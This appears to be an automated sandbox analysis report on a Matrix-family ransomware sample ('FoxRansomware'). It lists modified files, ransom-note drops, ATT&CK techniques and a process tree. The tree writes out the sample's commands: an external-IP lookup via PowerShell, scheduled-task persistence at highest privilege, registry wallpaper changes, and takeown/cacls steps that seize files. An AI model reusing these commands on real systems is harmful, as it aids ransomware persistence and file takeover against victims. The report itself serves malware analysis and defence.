File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\ConvertAdd.mhtml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Hovd	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\splash.gif	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\More Games\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\classlist	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Edmonton	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\ja-JP\Solitaire.exe.mui	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\winamp2.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Godthab	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\fil.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\main.css	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\blocklist.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\precomplete	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1652	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1600	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2040	powershell.exe
1468	x8OFcCor64.exe
1468	x8OFcCor64.exe
1468	x8OFcCor64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1468	x8OFcCor64.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1468	x8OFcCor64.exe
Token: SeLoadDriverPrivilege	1468	x8OFcCor64.exe
Token: SeTakeOwnershipPrivilege	1964	takeown.exe
Token: SeTakeOwnershipPrivilege	324	takeown.exe
Token: SeTakeOwnershipPrivilege	540	takeown.exe
Token: SeTakeOwnershipPrivilege	1452	takeown.exe
Token: SeTakeOwnershipPrivilege	1760	takeown.exe
Token: SeBackupPrivilege	992	vssvc.exe
Token: SeRestorePrivilege	992	vssvc.exe
Token: SeAuditPrivilege	992	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1552 wrote to memory of 1372	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	28
PID 1552 wrote to memory of 1372	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	28
PID 1552 wrote to memory of 1372	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	28
PID 1552 wrote to memory of 1372	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	28
PID 1552 wrote to memory of 1456	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	30
PID 1552 wrote to memory of 1456	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	30
PID 1552 wrote to memory of 1456	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	30
PID 1552 wrote to memory of 1456	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	30
PID 1552 wrote to memory of 1504	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	34
PID 1552 wrote to memory of 1504	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	34
PID 1552 wrote to memory of 1504	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	34
PID 1552 wrote to memory of 1504	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	34
PID 1504 wrote to memory of 2040	1504	cmd.exe	36
PID 1504 wrote to memory of 2040	1504	cmd.exe	36
PID 1504 wrote to memory of 2040	1504	cmd.exe	36
PID 1504 wrote to memory of 2040	1504	cmd.exe	36
PID 1552 wrote to memory of 324	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 1552 wrote to memory of 324	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 1552 wrote to memory of 324	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 1552 wrote to memory of 324	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 1552 wrote to memory of 1308	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	39
PID 1552 wrote to memory of 1308	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	39
PID 1552 wrote to memory of 1308	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	39
PID 1552 wrote to memory of 1308	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	39
PID 1308 wrote to memory of 540	1308	cmd.exe	41
PID 1308 wrote to memory of 540	1308	cmd.exe	41
PID 1308 wrote to memory of 540	1308	cmd.exe	41
PID 1308 wrote to memory of 540	1308	cmd.exe	41
PID 324 wrote to memory of 2036	324	cmd.exe	42
PID 324 wrote to memory of 2036	324	cmd.exe	42
PID 324 wrote to memory of 2036	324	cmd.exe	42
PID 324 wrote to memory of 2036	324	cmd.exe	42
PID 1552 wrote to memory of 1404	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	43
PID 1552 wrote to memory of 1404	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	43
PID 1552 wrote to memory of 1404	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	43
PID 1552 wrote to memory of 1404	1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	43
PID 1404 wrote to memory of 1244	1404	cmd.exe	45
PID 1404 wrote to memory of 1244	1404	cmd.exe	45
PID 1404 wrote to memory of 1244	1404	cmd.exe	45
PID 1404 wrote to memory of 1244	1404	cmd.exe	45
PID 324 wrote to memory of 1620	324	cmd.exe	46
PID 324 wrote to memory of 1620	324	cmd.exe	46
PID 324 wrote to memory of 1620	324	cmd.exe	46
PID 324 wrote to memory of 1620	324	cmd.exe	46
PID 324 wrote to memory of 1364	324	cmd.exe	47
PID 324 wrote to memory of 1364	324	cmd.exe	47
PID 324 wrote to memory of 1364	324	cmd.exe	47
PID 324 wrote to memory of 1364	324	cmd.exe	47
PID 1404 wrote to memory of 1752	1404	cmd.exe	49
PID 1404 wrote to memory of 1752	1404	cmd.exe	49
PID 1404 wrote to memory of 1752	1404	cmd.exe	49
PID 1404 wrote to memory of 1752	1404	cmd.exe	49
PID 1404 wrote to memory of 916	1404	cmd.exe	50
PID 1404 wrote to memory of 916	1404	cmd.exe	50
PID 1404 wrote to memory of 916	1404	cmd.exe	50
PID 1404 wrote to memory of 916	1404	cmd.exe	50
PID 916 wrote to memory of 304	916	cmd.exe	51
PID 916 wrote to memory of 304	916	cmd.exe	51
PID 916 wrote to memory of 304	916	cmd.exe	51
PID 916 wrote to memory of 304	916	cmd.exe	51
PID 304 wrote to memory of 1468	304	x8OFcCor.exe	52
PID 304 wrote to memory of 1468	304	x8OFcCor.exe	52
PID 304 wrote to memory of 1468	304	x8OFcCor.exe	52
PID 304 wrote to memory of 1468	304	x8OFcCor.exe	52

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW1p1jD5.exe"
  2⤵
  PID:1372
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW1p1jD5.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW1p1jD5.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\z0VqnEn1.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\8ZLwIiy4.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:324
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\8ZLwIiy4.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CTSPDq6I.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1308
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CTSPDq6I.vbs"
    3⤵
    PID:540
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uPd6kpQD.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1364
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uPd6kpQD.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1652
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:964
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:304
    - - C:\Users\Admin\AppData\Local\Temp\x8OFcCor64.exe
        
        x8OFcCor.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1728
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:1280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    - Modifies file permissions
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    - Modifies file permissions
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1728
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1592
